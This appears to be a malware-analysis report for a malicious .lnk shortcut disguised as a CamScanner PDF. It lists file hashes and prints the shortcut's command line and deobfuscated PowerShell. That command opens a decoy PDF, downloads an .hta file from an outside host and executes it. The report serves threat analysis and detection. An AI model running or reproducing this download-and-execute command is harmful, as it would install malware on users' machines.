Malicious
Malicious
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8fbf68a1d5c2a4b21b6863f42e75704c
Sha1
bd9ee6d3467893685d38b6360a3545366cf19c34
Sha256
a69a6aab118b41b35bb1abf0ea88f5abaeba2e3c173b12be1137f95ae88133da
Sha384
a57580f461fb8b4b46121a8dfddde1bce8915ac54b1f8245effe24abd368667731fb5e4c4fe327aef04b96534bd97250
Sha512
03df3184f97e8ab44c5db24d336ed21a2a03314d58d367243a9bbe44f6179586dfa4bdd9cc1ad261898895b22691ced4d8821f8081b28d53b51151a222dd0326
SSDeep
24:9ZY988VdvJVHyasqWvB250FgyNsLuw+ET/oMV8MGX1OMBM:9Z+ZzXHyXqkO0vOLV0MVW1OM2
TLSH
D321879E84237570E66C2A7C30F01B96360650E9F825594F07B0A6F677E6625C7D2B50
File Structure
8fbf68a1d5c2a4b21b6863f42e75704c
Malicious
CamScanner 16-06-2026 09.20.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

conhost.exe --headless cmd /c start /b msedge.exe --app=https://objectstorage.ap-dcc-gazipur-1.oraclecloud15.com/n/axvjbnqprylg/b/V2Ministry/o/office-mof/2026/5/73116f6a-e143-4581-8e48-5f6f082479fd.pdf | powershell (New-Object 'NeT.WeBclient').DownloadFile('https://jojoba.eu.pythonanywhere.com','%tmp%\%random%%random%%time:~9,2%.hta') & for %r in (%tmp%\*.hta) do call %r && exit
Deobfuscated PowerShell

(New-Object "NeT.WeBclient")."DownloadFile"("https://jojoba.eu.pythonanywhere.com", "%tmp%\%random%%random%%time:~9,2%.hta") & [Unmanaged(ErrorStatementAst)] for %r "in" (%tmp%\*.hta) "do" "call" "%r" && exit
8fbf68a1d5c2a4b21b6863f42e75704c (1.29 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙